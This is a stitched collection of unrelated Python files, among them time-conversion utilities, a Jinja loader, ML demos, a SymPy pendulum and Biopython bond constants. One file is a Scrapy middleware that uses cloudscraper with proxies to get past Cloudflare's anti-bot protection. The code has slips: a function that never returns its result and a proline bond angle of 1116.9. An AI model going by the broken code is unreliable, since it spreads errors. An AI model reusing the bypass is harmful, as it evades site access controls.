return mutations_list
def nextRandomPattern(self):
""" Gets a random pattern
Ensures that the same pattern is not selected twice
"""
if len(self.pattern_generator) == 0:
self.pattern_generator = self.mutation_patterns.copy()
index = self.rng.randint(0, len(self.pattern_generator) - 1)
ret = self.pattern_generator[index]
self.pattern_generator[index] = self.pattern_generator[len(self.pattern_generator) - 1]
self.pattern_generator[len(self.pattern_generator) - 1] = ret
self.pattern_generator.pop()
return ret
def generateRandomMutant(self) -> Tuple[Pattern, Occurrence, str, str]:
""" Mutates a line in the code by choosing random pattern then a random line
When running mutants sequentially and we want to control mutant order,
it would not be a good idea to use this call as it gives a
random mutant.
It is a better idea to set up your own runs with the other API methods. However,
this can be used as an example for what this class can do.
"""
# Reset pattern_generator to all patterns
self.pattern_generator = self.mutation_patterns.copy()
# Go through every pattern to find an occurrence
while len(self.pattern_generator) > 0:
pattern = self.nextRandomPattern()
occurrences = self.findOccurrences(pattern)
if len(occurrences) != 0:
occurrence = self.rng.choice(occurrences)
original_line, mutated_line = self.mutate(occurrence)
return pattern, occurrence, original_line, mutated_line
utils.red_print("Could not create a mutant. Please make sure it is a C file.")
utils.red_print("You may need to indent your C file.")
return None
|
# btrdb.utils.timez
# Conversion utilities for btrdb
#
# Author: PingThings
# Created: Wed Jan 02 17:00:49 2019 -0500
#
# Copyright (C) 2018 PingThings LLC
# For license information, see LICENSE.txt
#
# ID: timez.py [] allen@pingthings.io $
"""
Time related utilities
"""
##########################################################################
## Imports
##########################################################################
from datetime import datetime
from operator import mul
from decimal import Decimal
import pytz
##########################################################################
## Module Variables
##########################################################################
DATETIME_FORMATS = (
"%Y-%m-%d %H:%M:%S.%f%z", # most common RFC3339 nanoseconds
"%Y-%m-%d %H:%M:%S.%f", # expects UTC default timezone
"%Y-%m-%dT%H:%M:%S.%fZ", # JSON encoding, UTC timezone
"%Y-%m-%dT%H:%M:%SZ", # JSON encoding, UTC timezone
"%Y-%m-%dT%H:%M:%S.%f%z", # less common JSON-ish encoding
"%Y-%m-%dT%H:%M:%S.%f", # for completeness, UTC default timezone
"%Y-%m-%d %H:%M:%S%z", # human readable date time with TZ
"%Y-%m-%d %H:%M:%S", # human readable date time UTC default
"%Y-%m-%d", # helper to get midnight on a particular date
)
##########################################################################
## Functions
##########################################################################
def currently_as_ns():
"""
Returns the current UTC time as nanoseconds since epoch
"""
dt = datetime.utcnow()
return int(dt.timestamp() * 1e9)
def ns_to_datetime(ns):
"""
Converts nanoseconds to a datetime object (UTC)
Parameters
----------
ns : int
nanoseconds since epoch
Returns
-------
nanoseconds since epoch as a datetime object : datetime
"""
dt = datetime.utcfromtimestamp(ns / 1e9)
return dt.replace(tzinfo=pytz.utc)
def datetime_to_ns(dt):
"""
Converts a datetime object to nanoseconds since epoch. If a timezone aware
object is received then it will be converted to UTC.
Parameters
----------
dt : datetime
Returns
-------
nanoseconds : int
"""
if dt.tzinfo is None or dt.tzinfo.utcoffset(dt) is None:
aware = pytz.utc.localize(dt)
else:
aware = dt
dt_utc = aware.astimezone(pytz.utc)
return int(dt_utc.timestamp() * 1e9)
def to_nanoseconds(val):
"""
Converts datetime, datetime64, float, str (RFC 2822) to nanoseconds. If a
datetime-like object is received then nanoseconds since epoch is returned.
Parameters
----------
val : datetime, datetime64, float, str
an object to convert to nanoseconds
Returns
-------
object converted to nanoseconds : int
Notes
----
The following string formats are supported for conversion.
+--------------------------------+------------------------------------------+
| Format String | Description |
+================================+==========================================+
| %Y-%m-%d %H:%M:%S.%f%z | RFC3339 format |
+--------------------------------+------------------------------------------+
| %Y-%m-%d %H:%M:%S.%f | RFC3339 with UTC default timezone |
+--------------------------------+------------------------------------------+
| %Y-%m-%dT%H:%M:%S.%fZ | JSON encoding, UTC timezone |
+--------------------------------+------------------------------------------+
| %Y-%m-%dT%H:%M:%SZ | JSON encoding, UTC timezone, without μs |
+--------------------------------+------------------------------------------+
| %Y-%m-%dT%H:%M:%S.%f%z | JSON-like encoding |
+--------------------------------+------------------------------------------+
| %Y-%m-%dT%H:%M:%S.%f | JSON-like encoding, UTC default timezone |
+--------------------------------+------------------------------------------+
| %Y-%m-%d %H:%M:%S%z | human readable date time with TZ |
+--------------------------------+------------------------------------------+
| %Y-%m-%d %H:%M:%S | human readable date time UTC default |
+--------------------------------+------------------------------------------+
| %Y-%m-%d | midnight at a particular date |
+--------------------------------+------------------------------------------+
"""
if val is None or isinstance(val, int):
return val
try:
import numpy as np
if isinstance(val, np.datetime64):
val = val.astype(datetime)
except ImportError:
pass
if isinstance(val, str):
# handle int as string
if val.isdigit():
return int(val)
# handle datetime as string
for format in DATETIME_FORMATS:
try:
val = datetime.strptime(val, format)
break
except ValueError:
pass
if isinstance(val, str):
raise ValueError("unsupported string format, please use RFC3339")
if isinstance(val, datetime):
return datetime_to_ns(val)
if isinstance(val, float):
if val.is_integer():
return int(val)
else:
raise ValueError("can only convert whole numbers to nanoseconds")
raise TypeError("only int, float, str, datetime, and datetime64 are allowed")
def ns_delta(days=0, hours=0, minutes=0, seconds=0, milliseconds=0, \
microseconds=0, nanoseconds=0):
"""
Similar to `timedelta`, ns_delta represents a span of time but as
the total number of nanoseconds.
Parameters
----------
days : int, float, decimal.Decimal
days (as 24 hours) to convert to nanoseconds
hours : int, float, decimal.Decimal
hours to convert to nanoseconds
minutes : int, float, decimal.Decimal
minutes to convert to nanoseconds
seconds : int, float, decimal.Decimal
seconds to convert to nanoseconds
milliseconds : int, float, decimal.Decimal
milliseconds to convert to nanoseconds
microseconds : int, float, decimal.Decimal
microseconds to convert to nanoseconds
nanoseconds : int
nanoseconds to add to the time span
Returns
-------
amount of time in nanoseconds : int
"""
MICROSECOND = 1000
MILLISECOND = MICROSECOND * 1000
SECOND = MILLISECOND * 1000
MINUTE = SECOND * 60
HOUR = MINUTE * 60
DAY = HOUR * 24
if not isinstance(nanoseconds, int):
raise TypeError("nanoseconds argument must be an integer")
units = []
for unit in (days, hours, minutes, seconds, milliseconds, microseconds):
if isinstance(unit, float):
unit = Decimal(unit)
units.append(unit)
factors = [DAY, HOUR, MINUTE, SECOND, MILLISECOND, MICROSECOND]
nanoseconds += sum(map(mul, units, factors))
return int(nanoseconds)
|
"""
Jinja support adds the following abilities:
1. Adds a ``YamlFrontMatterLoader``, which searchs the beginning of the file for
YAML between two lines of an equal number of three or more dashes.
These lines are stripped off before rendering.
2. Jinja has nice support for displaying errors, but the YAML front matter
confuses things. This module fixes that, too, using a ``StrangeCaseStr``
which keeps track of how many lines to ignore. The blank lines are included
during compilation, and removed after the file is generated.
3. Provides a ``fix_paths`` function that returns a slash-separated relative path,
even on Windows.
Note: This function will also chomp any in-filename backslashes.
Hopefully you don't have any of those in the relative path to your template.
"""
import re
import os
from jinja2 import FileSystemLoader, Environment, Template
from jinja2.utils import internalcode
class StrangeCaseEnvironment(Environment):
def __init__(self, project_path, *args, **kwargs):
project_path = fix_path(project_path)
kwargs['loader'] = YamlFrontMatterLoader([project_path, os.getcwd() ,'/'])
self.template_class = StrangeCaseTemplate
super(StrangeCaseEnvironment, self).__init__(*args, **kwargs)
class StrangeCaseStr(str):
def __new__(self, content, number_yaml_lines):
s = str.__new__(self, content)
s.__init__(number_yaml_lines)
s.number_yaml_lines = number_yaml_lines
return s
class StrangeCaseTemplate(Template):
def render(self, *args, **kwargs):
ret = super(StrangeCaseTemplate, self).render(*args, **kwargs)
if hasattr(self, 'number_yaml_lines'):
lines = ret.splitlines()
ret = "\n".join(lines[self.number_yaml_lines:])
return ret
class YamlFrontMatterLoader(FileSystemLoader):
"""
After getting the file content, this loader parses out YAML front matter,
which must be the first thing in the file. It consists of three or more
dashes or backticks, a newline, YAML content, a newline and then the same
number of dashes or backticks, and a newline again.
Examples::
----
yaml: {goes: 'here'}
----
<!-- template -->
````
python = {'goes': 'here'}
````
<!-- template -->
When the python code is executed, it is given ``config`` as the local
context, so changes to local variables result in changes to the page
context.
"""
def get_source(self, environment, template):
"""
Matches 3 or more dashes or backticks to the beginning of the content,
and then tries to match the same delimiter.
"""
contents, filename, uptodate = super(YamlFrontMatterLoader, self).get_source(environment, template)
front_matter_match = re.match(r"\A([-]{3,}|[`]{3,})(\r\n|\r|\n)", contents)
number_yaml_lines = 0
if front_matter_match:
newline = front_matter_match.group(2) # group(2) contains the newline/CRLF
number_yaml_lines += 1
offset = len(front_matter_match.group(0))
delim = re.compile("^" + front_matter_match.group(1) + "$")
lines = contents.splitlines()
for line in lines[1:]: # skip the first line, the opening front matter
offset += len(line) + len(newline)
number_yaml_lines += 1
if delim.match(line):
break
contents = (newline * number_yaml_lines) + contents[offset:]
return StrangeCaseStr(contents, number_yaml_lines), filename, uptodate
@internalcode
def load(self, environment, name, globals=None):
"""
If a ``StrangeCaseStr`` is found, ``str.number_yaml_lines`` are stripped
off the front of the file after it is generated.
"""
code = None
if globals is None:
globals = {}
# first we try to get the source for this template together
# with the filename and the uptodate function.
source, filename, uptodate = self.get_source(environment, name)
# try to load the code from the bytecode cache if there is a
# bytecode cache configured.
bcc = environment.bytecode_cache
if bcc is not None:
bucket = bcc.get_bucket(environment, name, filename, source)
code = bucket.code
# if we don't have code so far (not cached, no longer up to
# date) etc. we compile the template
if code is None:
code = environment.compile(source, name, filename)
# if the bytecode cache is available and the bucket doesn't
# have a code so far, we give the bucket the new code and put
# it back to the bytecode cache.
if bcc is not None and bucket.code is None:
bucket.code = code
bcc.set_bucket(bucket)
t = environment.template_class.from_code(environment, code, globals, uptodate)
if isinstance(source, StrangeCaseStr):
t.number_yaml_lines = source.number_yaml_lines
return t
def fix_path(path):
"""
Provides a ``fix_paths`` function that returns a slash-separated relative path,
even on Windows.
Jinja chokes on backslash-separated paths, and slash-separated paths work well
enough in Windows anyway. See also Jinja2-99_, Jinja2-98_.
.. _Jinja2-98: https://github.com/mitsuhiko/jinja2/issues/98
.. _Jinja2-99: https://github.com/mitsuhiko/jinja2/pull/99
Note: This function will also chomp any in-filename backslashes.
Hopefully you don't have any of those in the relative path to your template.
"""
return path.replace(os.path.sep, '/')
|
import click
verbose = click.option(
'--verbose', '-v', count=True, help="Increase verbosity.")
quiet = click.option(
'--quiet', '-q', count=True, help="Decrease verbosity.")
|
"""Handling of the input options
This module contains the useful quantities to deal with the preparation and
the usage of inputfiles for BigDFT code. The main object is the
:class:`Inputfile` class, which inherits from a python dictionary. Such
inheritance is made possible by the internal representation of the BigDFT
inputfile, which employs the YAML syntax. This means that there is a one-to-one
correspondence between a python dictionary and a BigDFT inputfile.
"""
class Inputfile(dict):
""" The BigDFT inputfile.
Principal object needed to run a BigDFT calculation.
Might be initialized either from a dictionary, a
:py:class:`~BigDFT.Logfiles.Logfile` instance
or a (yaml-compliant) filename path
Note:
Each of the actions of the module :py:mod:`~BigDFT.InputActions`, which
is defined on a generic dictionary, also corresponds to a method of of
the `Inputfile` class, and it is applied to the class instance.
Therefore also the first argument of the corresponding action is
implicitly the class instance. For the
:py:func:`~BigDFT.InputActions.remove` method, the action has to be
invoked should come from the :py:mod:`~BigDFT.InputActions` module.
.. _input_action_example:
Example:
>>> import InputActions as A, Inputfiles as I
>>> inp=I.Inputfile()
>>> inp.set_hgrids(0.3) # equivalent to A.set_hgrids(inp,0.3)
>>> inp
{'dft': {'hgrids': 0.3}}
>>> inp.optimize_geometry() # equivalent to A.optimize_geometry(inp)
>>> inp
{'dft': {'hgrids': 0.3},'geopt': {'method': 'FIRE',
'ncount_cluster_x': 50} }
>>> # equivalent to A.remove(inp,A.optimize_geometry)
>>> inp.remove(A.optimize_geometry)
>>> inp
{'dft': {'hgrids': 0.3}}
.. todo ::
Consider the possiblity of initializing an `Inputfile` instance
from a ``yaml`` file. And also from a
:py:class:`~BigDFT.Logfiles.Logfile` class
"""
def __init__(self, *args, **kwargs):
import BigDFT.InputActions as A
dict.__init__(self, *args, **kwargs)
functions = dir(A)
for action in functions:
if "__" in action:
continue
from functools import partial
func = getattr(A, action)
setattr(self, action, partial(func, self))
method = getattr(self, action)
method.__doc__ = func.__doc__
|
#check palindrome practical 5
'''notes: if the input string is equal to the reverse string then it is a pallindrome '''
s = input("Enter a string: ")
r = s[::-1]
if s == r:
print("It's a palindrome!")
else:
print("It's not a palindrome")
|
import tensorflow as tf
def main():
# simple test: assign a tensor to a slice of another tensor
# - then run some op depending on that assignment (control_dependency)
# the "buffer" to assign a slice to (matrix of 3x3)
buffer = tf.Variable(tf.zeros(shape=(2, 2)))
# the slice (one row of a 3x3 matrix)
slice_ = tf.Variable(tf.ones(shape=(2,)))
# the slice assignment op (inserts slice_ as the second row into the buffer)
insert_row = tf.assign(buffer[1,:], slice_)
# need to add the control dependency here
# - otherwise, the insert_row op would not be executed when calling sess.run(out)
# because out is not directly dependent on the 'calculation' of the assignment
with tf.control_dependencies([insert_row]):
out = tf.identity(buffer, name="identity")
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
res = sess.run(out)
print("Result is {}".format(res))
if __name__ == "__main__":
main()
|
#!/usr/bin/env python3
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('fasta', type=argparse.FileType('r'))
args = parser.parse_args()
from Bio import SeqIO
lengthes = []
for record in SeqIO.parse(args.fasta, 'fasta'):
lengthes.append(len(record))
lengthes.sort()
from scipy import stats
import numpy as np
import os
cs = np.cumsum(lengthes)
N50 = lengthes[(cs > cs[-1]*0.5).nonzero()[0][0]]
max_length = lengthes[-1]
print(os.path.splitext(os.path.basename(args.fasta.name))[0],
N50, max_length, cs[-1], sep='\t')
|
import asyncio
import urllib
from functools import partial
import twisted.internet
import cloudscraper
from scrapy.http import HtmlResponse
from twisted.internet.asyncioreactor import AsyncioSelectorReactor
from twisted.internet.defer import Deferred
import sys
from .settings import *
if sys.platform == 'win32':
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
reactor = AsyncioSelectorReactor(asyncio.get_event_loop())
# install AsyncioSelectorReactor
twisted.internet.reactor = reactor
sys.modules['twisted.internet.reactor'] = reactor
def as_deferred(f):
"""
transform a Twisted Deffered to an Asyncio Future
:param f: async function
"""
return Deferred.fromFuture(asyncio.ensure_future(f))
logger = logging.getLogger('aroay_cloudscraper')
class CloudScraperMiddleware(object):
"""
Downloader middleware handling the requests with Puppeteer
"""
def __init__(self):
self.scraper = cloudscraper.create_scraper(browser={
'browser': 'firefox',
'platform': 'windows',
'mobile': False
})
# 将cloudflare变为协程函数
def _block_get(self, url, *args, **kwargs):
response = self.scraper.get(url, *args, **kwargs)
# 返回response对象
return response
async def _simple_run_in_executor(self, f, *args, async_loop=None, **kwargs):
loopx = async_loop or asyncio.get_event_loop()
response = await loopx.run_in_executor(None, partial(f, *args, **kwargs))
return response
# f封装requests为协程函数
async def async_get(self, url, *args, **kwargs):
response = await self._simple_run_in_executor(self._block_get, url, *args, **kwargs)
return response
@classmethod
def from_crawler(cls, crawler):
"""
init the middleware
:param crawler:
:return:
"""
settings = crawler.settings
logging_level = settings.get('AROAY_CLOUDSCRAPER_LOGGING_LEVEL', AROAY_CLOUDSCRAPER_LOGGING_LEVEL)
logging.getLogger('websockets').setLevel(logging_level)
logging.getLogger('aroay_cloudscraper').setLevel(logging_level)
cls.download_timeout = settings.get('AROAY_CLOUDSCRAPER_DOWNLOAD_TIMEOUT',
settings.get('DOWNLOAD_TIMEOUT', AROAY_CLOUDSCRAPER_DOWNLOAD_TIMEOUT))
cls.delay = settings.get('AROAY_CLOUDSCRAPER_DELAY', AROAY_CLOUDSCRAPER_DELAY)
return cls()
async def _process_request(self, request, spider):
"""
use aroay_cloudscraper to process spider
:param request:
:param spider:
:return:
"""
# get aroay_cloudscraper meta
cloudscraper_meta = request.meta.get('aroay_cloudscraper') or {}
logger.debug('cloudscraper_meta %s', cloudscraper_meta)
if not isinstance(cloudscraper_meta, dict) or len(cloudscraper_meta.keys()) == 0:
return
# 设置代理
_proxy = cloudscraper_meta.get('proxy')
logger.info("set proxy is %s" % _proxy)
# 设置请求超时
_timeout = self.download_timeout
if cloudscraper_meta.get('timeout') is not None:
_timeout = cloudscraper_meta.get('timeout')
_cookies = cloudscraper_meta.get('cookies ')
logger.debug('crawling %s', request.url)
response = await self.async_get(request.url, proxies=_proxy, timeout=_timeout,
cookies=_cookies)
# 设置延迟
_delay = self.delay
if cloudscraper_meta.get('delay') is not None:
_delay = cloudscraper_meta.get('delay')
if _delay is not None:
logger.debug('sleep for %ss', _delay)
await asyncio.sleep(_delay)
# 返回二进制
response = HtmlResponse(
request.url,
status=response.status_code,
headers=response.headers,
body=response.content,
encoding='utf-8',
request=request
)
return response
def process_request(self, request, spider):
"""
process request using aroay_cloudscraper
:param request:
:param spider:
:return:
"""
logger.debug('processing request %s', request)
return as_deferred(self._process_request(request, spider))
async def _spider_closed(self):
pass
def spider_closed(self):
"""
callback when spider closed
:return:
"""
return as_deferred(self._spider_closed())
|
import numpy as np
# Compute double element-wise square of vector
def vsquaresquare(V):
R = np.power(np.power(V, 2), 2)
|
import torch
import numpy as np
import mmcv
import cv2
def mask_rotate_target(pos_proposals_list, pos_assigned_gt_inds_list, gt_masks_list,
cfg):
cfg_list = [cfg for _ in range(len(pos_proposals_list))]
mask_rotate_targets = map(mask_rotate_target_single, pos_proposals_list,
pos_assigned_gt_inds_list, gt_masks_list, cfg_list)
mask_rotate_targets = torch.cat(list(mask_rotate_targets))
return mask_rotate_targets
def crop_rotate_mask(gt_mask, x,y,w,h,theta):
rows, cols = gt_mask.shape
expand_layer = np.zeros((rows*2,cols*2),dtype='uint8')
rows_start = int(rows / 2)
cols_start = int(cols / 2)
expand_layer[rows_start:rows_start+rows, cols_start:cols_start+cols]=gt_mask
M = cv2.getRotationMatrix2D((x+cols_start,y+rows_start),theta*180/np.pi,1)
dst = cv2.warpAffine(expand_layer,M,expand_layer.shape[::-1],borderValue=0)
M = np.float32([[1.0,0,-x+w/2-cols_start],[0,1,-y+h/2-rows_start]])
dst = cv2.warpAffine(dst,M,dst.shape[::-1],borderValue=0)
dst = dst[:np.int(h), :np.int(w)]
return dst
def mask_rotate_target_single(pos_proposals, pos_assigned_gt_inds, gt_masks, cfg):
mask_size = cfg.mask_size
num_pos = pos_proposals.size(0)
mask_rotate_targets = []
if num_pos > 0:
proposals_np = pos_proposals.cpu().numpy()
pos_assigned_gt_inds = pos_assigned_gt_inds.cpu().numpy()
for i in range(num_pos):
# import pdb
# pdb.set_trace()
gt_mask = gt_masks[pos_assigned_gt_inds[i]]
bbox = proposals_np[i, :]
x, y, w, h, theta = bbox
w = np.maximum(w, 1)
h = np.maximum(h, 1)
dst = crop_rotate_mask(gt_mask, x, y, w, h, theta)
# mask is uint8 both before and after resizing
target = mmcv.imresize(dst, (mask_size, mask_size))
mask_rotate_targets.append(target)
mask_rotate_targets = torch.from_numpy(np.stack(mask_rotate_targets)).float().to(
pos_proposals.device)
else:
mask_rotate_targets = pos_proposals.new_zeros((0, mask_size, mask_size))
return mask_rotate_targets
|
import sympy.physics.mechanics as me
import sympy as sm
import math as m
import numpy as np
q1, q2 = me.dynamicsymbols("q1 q2")
q1d, q2d = me.dynamicsymbols("q1 q2", 1)
q1d2, q2d2 = me.dynamicsymbols("q1 q2", 2)
l, m, g = sm.symbols("l m g", real=True)
frame_n = me.ReferenceFrame("n")
point_pn = me.Point("pn")
point_pn.set_vel(frame_n, 0)
theta1 = sm.atan(q2 / q1)
frame_a = me.ReferenceFrame("a")
frame_a.orient(frame_n, "Axis", [theta1, frame_n.z])
particle_p = me.Particle("p", me.Point("p_pt"), sm.Symbol("m"))
particle_p.point.set_pos(point_pn, q1 * frame_n.x + q2 * frame_n.y)
particle_p.mass = m
particle_p.point.set_vel(frame_n, (point_pn.pos_from(particle_p.point)).dt(frame_n))
f_v = me.dot((particle_p.point.vel(frame_n)).express(frame_a), frame_a.x)
force_p = particle_p.mass * (g * frame_n.x)
dependent = sm.Matrix([[0]])
dependent[0] = f_v
velocity_constraints = [i for i in dependent]
u_q1d = me.dynamicsymbols("u_q1d")
u_q2d = me.dynamicsymbols("u_q2d")
kd_eqs = [q1d - u_q1d, q2d - u_q2d]
forceList = [(particle_p.point, particle_p.mass * (g * frame_n.x))]
kane = me.KanesMethod(
frame_n,
q_ind=[q1, q2],
u_ind=[u_q2d],
u_dependent=[u_q1d],
kd_eqs=kd_eqs,
velocity_constraints=velocity_constraints,
)
fr, frstar = kane.kanes_equations([particle_p], forceList)
zero = fr + frstar
f_c = point_pn.pos_from(particle_p.point).magnitude() - l
config = sm.Matrix([[0]])
config[0] = f_c
zero = zero.row_insert(zero.shape[0], sm.Matrix([[0]]))
zero[zero.shape[0] - 1] = config[0]
|
import pixellib
from pixellib.instance import custom_segmentation
segment_image = custom_segmentation()
segment_image.inferConfig(num_classes= 2, class_names= ["BG", "butterfly", "squirrel"])
segment_image.load_model("mask_rcnn_model.005-0.443756.h5")
segment_image.segmentImage("butterfly (1).jpg", show_bboxes=True, output_image_name="sample_out.jpg")
|
# Copyright (C) 2011 by Michele Silva (michele.silva@gmail.com)
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
""" Bond length and angle constants.
These constants are primarily extracted from Engh, Huber, 1991.
Engh R A & Huber R (1991). Accurate bond and angle parameters for X-ray protein
structure refinement. Acta Cryst., A47, 392-400. DOI: 10.1107/S0108767391001071
"""
import math
class DefaultValueDict(dict):
""" Dictionary with default values for missing keys. """
def __init__(self, default, values=None, **kwds):
"""
@param default: The default value when the key is missing.
@type: object
@param values: The values to initialize the dictionary.
@type: list or dict
"""
if values:
super(DefaultValueDict, self).__init__(values)
self.update(kwds)
self.default = default
def __getitem__(self, key):
return self.get(key, self.default)
def __copy__(self):
return DefaultValueDict(self.default, self)
ATOMS = [
'N', 'CA', 'C', 'O', 'CB', 'SG', 'OG', 'OG1', 'CG', 'CG1',
'CG2', 'SD', 'OD1', 'OD2', 'ND1', 'ND2', 'CD', 'CD1', 'CD2', 'OE1',
'OE2', 'NE', 'NE1', 'NE2', 'CE', 'CE1', 'CE2', 'CE3', 'NZ', 'CZ',
'CZ2', 'CZ3', 'OH', 'NH1', 'NH2', 'CH2', 'CM', 'H', 'HA', 'HA1',
'HA2', 'HA3', 'HB', 'HB1', 'HB2', 'HB3', 'HG', 'HG1', 'HG2', 'HG3',
'HG11', 'HG12', 'HG13', 'HG21', 'HG22', 'HG23', 'HD1', 'HD2', 'HD3',
'HD11', 'HD12', 'HD13', 'HD21', 'HD22', 'HD23', 'HE', 'HE1', 'HE2',
'HE3', 'HE21', 'HE22', 'HH', 'HH2', 'HH11', 'HH12', 'HH21', 'HH22',
'HZ', 'HZ1', 'HZ2', 'HZ3', 'H1', 'H2', 'H3', 'OXT', 'XX', 'XS',
'XO', 'XN', 'XC', 'XH',
]
ANGLE_N_CA_CB = DefaultValueDict(110.5, {'ALA':110.4, 'ILE':111.5, 'THR':111.5, 'VAL':111.5,'PRO':103.0})
ANGLE_CB_CA_C = DefaultValueDict(110.1, {'ALA':110.5, 'ILE':109.1, 'THR':109.1, 'VAL':109.1})
BOND_LENGTH_CA_CB = DefaultValueDict(1.530, {'ALA':1.521, 'ILE':1.540, 'THR':1.540, 'VAL':1.540})
ANGLE_O_C_N = DefaultValueDict(123.0, {'PRO':122.0})
BOND_LENGTH_C_N = DefaultValueDict(1.329, {'PRO':1.341})
BOND_LENGTH_C_O = 1.231
BOND_LENGTH_MAINCHAIN = {
('CA', 'N'): DefaultValueDict(1.458, {'GLY': 1.451, 'PRO': 1.466}),
('C', 'CA'): DefaultValueDict(1.525, {'GLY': 1.516}),
('C', 'N'): DefaultValueDict(1.329, {'PRO': 1.341}),
('CA', 'CB'): DefaultValueDict(1.530, {'ALA': 1.521, 'ILE': 1.540, 'THR': 1.540, 'VAL': 1.540}),
('C', 'O'): DefaultValueDict(1.231),
('C', 'OXT'): DefaultValueDict(1.231),
('CA', 'CA'): DefaultValueDict(3.8),
}
BOND_LENGTH_SIDECHAIN = {
'CYS': {('CB', 'SG'): 1.808},
'ASP': {('CB', 'CG'): 1.516, ('CG', 'OD1'): 1.249, ('CG', 'OD2'): 1.249},
'GLU': {('CB', 'CG'): 1.520, ('CD', 'CG'): 1.516, ('CD', 'OE1'): 1.249,
('CD', 'OE2'): 1.249},
'PHE': {('CB', 'CG'): 1.502, ('CD1', 'CG'): 1.384, ('CD2', 'CG'): 1.384,
('CD1', 'CE1'): 1.382, ('CD2', 'CE2'): 1.382, ('CE1', 'CZ'): 1.382,
('CE2', 'CZ'): 1.382},
'HIS': {('CB', 'CD'): 1.497, ('CG', 'ND1'): 1.371, ('CD2', 'CG'): 1.356,
('CE1', 'ND1'): 1.319, ('CD2', 'NE2'): 1.374, ('CE1', 'NE2'): 1.374},
'ILE': {('CB', 'CG1'): 1.530, ('CB', 'CG2'): 1.521, ('CD1', 'CG1'): 1.513},
'LYS': {('CB', 'CG'): 1.520, ('CD', 'CG'): 1.520, ('CD', 'CE'): 1.520,
('CE', 'NZ'): 1.489},
'LEU': {('CB', 'CG'): 1.530, ('CD1', 'CG'): 1.521, ('CD2', 'CG'): 1.521},
'MET': {('CB', 'CG'): 1.520, ('CG', 'SD'): 1.803, ('CE', 'SD'): 1.791},
'ASN': {('CB', 'CG'): 1.520, ('CG', 'OD1'): 1.231, ('CG', 'ND2'): 1.328},
'PRO': {('CB', 'CG'): 1.492, ('CD', 'CG'): 1.503},
'GLN': {('CB', 'CG'): 1.520, ('CD', 'CG'): 1.516, ('CD', 'OE1'): 1.231,
('CD', 'NE2'): 1.328},
'ARG': {('CB', 'CG'): 1.520, ('CD', 'CG'): 1.520, ('CD', 'NE'): 1.460,
('CZ', 'NE'): 1.329, ('CZ', 'NH1'): 1.326, ('CZ', 'NH2'): 1.326},
'SER': {('CB', 'OG'): 1.417},
'THR': {('CB', 'OG1'): 1.433, ('CB', 'CG2'): 1.521},
'VAL': {('CB', 'CG1'): 1.521, ('CB', 'CG2'): 1.521},
'TRP': {('CB', 'CG'): 1.498, ('CD1', 'CG'): 1.433, ('CD2', 'CG'): 1.365,
('CD1', 'NE1'): 1.374, ('CE2', 'NE1'): 1.370, ('CD2', 'CE2'): 1.409,
('CD2', 'CE3'): 1.398, ('CE2', 'CZ2'): 1.394, ('CH2', 'CZ2'): 1.368,
('CE3', 'CZ3'): 1.382, ('CH2', 'CZ3'): 1.400},
'TYR': {('CB', 'CG'): 1.512, ('CD1', 'CG'): 1.389, ('CD2', 'CG'): 1.389,
('CD1', 'CE1'): 1.382, ('CD2', 'CE2'): 1.382, ('CE1', 'CZ'): 1.378,
('CE2', 'CZ'): 1.378, ('OH', 'CZ'): 1.376},
}
BOND_LENGTH_PSEUDO_SIDECHAIN = {'ALA': 1.54, 'CYS': 2.8, 'ASP': 2.92, 'GLU': 3.125,
'PHE': 3.79, 'GLY': 1.0, 'HIS': 3.57, 'ILE': 2.7, 'LYS': 4.6, 'LEU': 3.05,
'MET': 3.185, 'ASN': 2.91, 'PRO': 2.29, 'GLN': 3.875, 'ARG': 4.8, 'SER': 2.43,
'THR': 2.17, 'VAL': 2.19, 'TRP': 4.2, 'TYR': 4.27}
BOND_ANGLE_MAINCHAIN = {
('C', 'N', 'CA'): DefaultValueDict(121.7, {'GLY': 120.6, 'PRO': 122.6}),
('N', 'CA', 'C'): DefaultValueDict(111.2, {'GLY': 112.5, 'PRO': 111.8}),
('CA', 'C', 'N'): DefaultValueDict(116.2, {'GLY': 116.4, 'PRO': 1116.9}),
('CA', 'C', 'O'): DefaultValueDict(120.8, {'GLY': 120.8}),
('CA', 'C', 'OXT'): DefaultValueDict(117.0),
}
BOND_ANGLE_SIDECHAIN = {
'CYS': {('CA', 'CB', 'SG'): 114.4},
'ASP': {('CA', 'CB', 'CG'): 112.6, ('CB', 'CG', 'OD1'): 118.4,
('CB', 'CG', 'OD2'): 118.4},
'GLU': {('CA', 'CB', 'CG'): 114.1, ('CB', 'CG', 'CD'): 112.6,
('CG', 'CD', 'OE1'): 118.4, ('CG', 'CD', 'OE2'): 118.4},
'PHE': {('CA', 'CB', 'CG'): 113.8, ('CB', 'CG', 'CD1'): 120.7,
('CD1', 'CG', 'CD2'): 118.6, ('CG', 'CD1', 'CE1'): 120.7,
('CG', 'CD2', 'CE2'): 120.7, ('CD1', 'CE1', 'CZ'): 120.0,
('CD2', 'CE2', 'CZ'): 120.0, ('CE2', 'CZ', 'CE1'): 120.0},
'HIS': {('CA', 'CB', 'CG'): 113.8, ('CB', 'CG', 'ND1'): 121.6,
('ND1', 'CG', 'CD2'): 109.3, ('CG', 'ND1', 'CE1'): 105.6,
('CG', 'CD2', 'NE2'): 106.5, ('ND1', 'CE1', 'NE2'): 111.7,
('CD2', 'NE2', 'CE1'): 107.0},
'ILE': {('CA', 'CB', 'CG1'): 110.4, ('CA', 'CB', 'CG2'): 110.5,
('CB', 'CG1', 'CD1'): 113.8},
'LYS': {('CA', 'CB', 'CG'): 114.1, ('CB', 'CG', 'CD'): 111.3,
('CG', 'CD', 'CE'): 111.3, ('CD', 'CE', 'NZ'): 111.9},
'LEU': {('CA', 'CB', 'CG'): 116.3, ('CB', 'CG', 'CD1'): 110.7,
('CB', 'CG', 'CD2'): 110.7},
'MET': {('CA', 'CB', 'CG'): 114.1, ('CB', 'CG', 'SD'): 112.7,
('CG', 'SD', 'CE'): 100.9},
'ASN': {('CA', 'CB', 'CG'): 112.6, ('CB', 'CG', 'OD1'): 120.8,
('CB', 'CG', 'ND2'): 116.4},
'PRO': {('CA', 'CB', 'CG'): 104.5, ('CB', 'CG', 'CD'): 106.1},
'GLN': {('CA', 'CB', 'CG'): 114.1, ('CB', 'CG', 'CD'): 112.6,
('CG', 'CD', 'OE1'): 120.8, ('CG', 'CD', 'NE2'): 116.4},
